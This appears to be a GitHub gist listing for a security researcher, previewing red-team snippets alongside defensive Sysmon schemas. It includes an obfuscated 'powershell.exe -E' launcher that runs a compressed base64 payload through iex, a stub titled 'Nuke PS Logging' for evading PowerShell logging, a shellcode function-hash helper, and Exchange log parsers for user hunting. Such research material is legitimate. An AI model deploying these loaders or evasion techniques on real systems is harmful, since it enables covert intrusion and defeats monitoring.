Skip to content

Instantly share code, notes, and snippets.

View leechristensen's full-sized avatar

Lee Chagolla-Christensen leechristensen

635 followers · 0 following
View GitHub Profile
@leechristensen
leechristensen / Sysmon XML Schema
Created September 25, 2015 20:38
Pulled it using strings.exe..... :)
<!DOCTYPE Sysmon [<!ELEMENT Sysmon (EventFiltering|HashAlgorithms)*>
<!ATTLIST Sysmon schemaversion CDATA #REQUIRED>
<!ELEMENT EventFiltering (ProcessCreate|FileCreateTime|NetworkConnect|ProcessTerminate|DriverLoad|ImageLoad|CreateRemoteThread)*>
<!ELEMENT ProcessCreate (SequenceNumber|UtcTime|ProcessGuid|ProcessId|Image|CommandLine|CurrentDirectory|User|LogonGuid|LogonId|TerminalSessionId|IntegrityLevel|Hashes|ParentProcessGuid|ParentProcessId|ParentImage|ParentCommandLine)*>
<!ATTLIST ProcessCreate onmatch (include|exclude) #IMPLIED>
<!ATTLIST ProcessCreate default (include|exclude) #IMPLIED>
<!ELEMENT SequenceNumber (#PCDATA)*>
<!ATTLIST SequenceNumber condition CDATA "is">
@leechristensen
leechristensen / ParseRPCClientAccessLogs.ps1
Created January 27, 2016 17:38
Parses Exchange's RPC Client Access Logs to get client usernames/IP addresses.
# Author: Lee Christensen (@tifkin_)
#$RPClientLogDir = "$($env:exchangeinstallpath)\Logging\RPC Client Access\"
$RPClientLogDir = "."
$NumberOfLogs = 100
$RecentLogs = ls "$RPClientLogDir\*.log" | sort LastWriteTime -Descending | select -First $NumberOfLogs -ExpandProperty FullName
$UserLogons = @()
foreach($Log in $RecentLogs)
{
@leechristensen
leechristensen / ParseEwsExchangeLogs.ps1
Created January 27, 2016 18:09
Extracts the email and client IP address from Exchange's EWS logs. Useful for user hunting.
$EWSLogPath = "$($env:exchangeinstallpath)\Logging\EWS\"
$EWSLogPath = "."
$NumberOfLogs = 10
$RecentLogs = ls "$EWSLogPath\*.log" | sort LastWriteTime -Descending | select -First $NumberOfLogs -ExpandProperty FullName
$UserLogons = @()
foreach($Log in $RecentLogs)
{
$LogFile = Get-Content $Log | select -Skip 5
@leechristensen
leechristensen / Sysmon4.0XmlConfigSchema.xml
Created April 28, 2016 23:05
Sysmon v4.0 XML Configuration Schema
<!DOCTYPE Sysmon [<!ELEMENT Sysmon (EventFiltering|HashAlgorithms)*>
<!ATTLIST Sysmon schemaversion CDATA #REQUIRED>
<!ELEMENT EventFiltering (ProcessCreate|FileCreateTime|NetworkConnect|ProcessTerminate|DriverLoad|ImageLoad|CreateRemoteThread|RawAccessRead)*>
<!ELEMENT ProcessCreate (UtcTime|ProcessGuid|ProcessId|Image|CommandLine|CurrentDirectory|User|LogonGuid|LogonId|TerminalSessionId|IntegrityLevel|Hashes|ParentProcessGuid|ParentProcessId|ParentImage|ParentCommandLine)*>
<!ATTLIST ProcessCreate onmatch (include|exclude) #IMPLIED>
<!ATTLIST ProcessCreate default (include|exclude) #IMPLIED>
<!ELEMENT UtcTime (#PCDATA)*>
<!ATTLIST UtcTime condition CDATA "is">
<!ELEMENT ProcessGuid (#PCDATA)*>
<!ATTLIST ProcessGuid condition CDATA "is">
@leechristensen
leechristensen / gist:e83265c78d5eb8b356dc2ece2ccf493f
Last active June 9, 2016 09:23
PS C:\> $Command = 'powershell.exe -E "cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAagBWAEQATgBhAHQAdABBAEUATAA0AGIALwBBADYARABFAEcAUgBGAHIAUwBWAE4ANgBNAFgARgBoADkAWgB1ADAAMABBAGMAVABLADIAMgBCACsASABEAFcAcABwAFkAUwAxAGMANwBZAG4AZgBVADEASQBTACsAZQAwAGUAVwAwADAAQgBQAHUAVwBqAEYAegBIAHkALwBLAFIAOAA3AGgAQQBWADgAcQBPAHUAOABHAEgANwB6AE4AYgBaADcARABDAHQAOABzAE4ANgB5AEoAUQA4AFgANQBjAHEANQAyADcAYQBqAHcAQwByADUAaQBjAEcAagB1ADcANwBTAHQAWABQAEoAYgBOAG0AWQBzAEUAVgBlAG4ARgAvADkAegBkAHUASwBhAHMAeAAyAFgAYgA5ADMAdABvAEwASQBoAHUAWABCADMAeQB3AHcAdQBQAFcAOAA0AFEAQQAzAHkARQB0AHEAVwArAFAAcgBPACsAdABSAFoAZQA4AHYASQBOACsAWQBHAEkAcwBtADkASgBEAGYAbQB4AGIAaABoAC8AWABYAFYAOQBOAEoATwBwAHcAdgBJAEIAMAA4AHoAdQBmAC8ANAAyAFMALwBQAGUAMwBMAHIANwAxAG4AMgA2AEkAVwBBAFEAegBVAGIAVABIADgA
@leechristensen
leechristensen / PrintFunctionHashes.c
Last active June 19, 2020 13:35
Calculates function hashes for use in Matt Graeber's C to Shellcode project
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
// Calculates function hashes for use in Matt Graeber's C to Shellcode project
// See http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html
//
// Usage: PrintFunctionHashes.exe user32.dll | findstr /i messagebox
// This compiles to a ROR instruction
@leechristensen
leechristensen / EnableWebDAV.md
Last active December 14, 2016 01:51

1) Enable WebDAV

sudo a2enmod dav
sudo a2enmod dav_fs

mkdir -p /var/www/webdav
touch /var/www/DavLock
chown www-data:www-data /var/www/webdav /var/www/DavLock

2) vim /etc/apache2/sites-available/000-default.conf

@leechristensen
leechristensen / PInvokedMethodsV2.txt
Created January 21, 2017 01:08
PowerShell 2.0 PInvoke'd Methods
Name Dll DeclaringType
---- --- -------------
GetCurrentThreadId kernel32.dll System.AppDomain
VarCyFromDec oleaut32.dll System.StubHelpers.StubHelpers
VarDecFromCy oleaut32.dll System.StubHelpers.StubHelpers
CreateActContext mscorwks.dll System.Deployment.Internal.Isolation.IsolationInterop
CreateCMSFromXml mscorwks.dll System.Deployment.Internal.Isolation.IsolationInterop
ParseManifest mscorwks.dll System.Deployment.Internal.Isolation.IsolationInterop
GetUserStore mscorwks.dll System.Deployment.Internal.Isolation.IsolationInterop
@leechristensen
leechristensen / NukePSLogging.cpp
Created March 17, 2017 09:20
Nuke PS Logging
void Payload() {
DWORD threadId;
CreateThread(
NULL, // default security attributes
0, // use default stack size
MyThreadFunction, // thread function name
NULL, // argument to thread function
0, // use default creation flags
&threadId);
}
@leechristensen
leechristensen / keybase.md
Created April 24, 2017 23:00

Keybase proof

I hereby claim:

  • I am leechristensen on github.
  • I am tifkin (https://keybase.io/tifkin) on keybase.
  • I have a public key whose fingerprint is 91F2 D977 5912 0E51 AD40 0C64 2217 7C8E 7D5A 102D

To claim this, I am signing this object: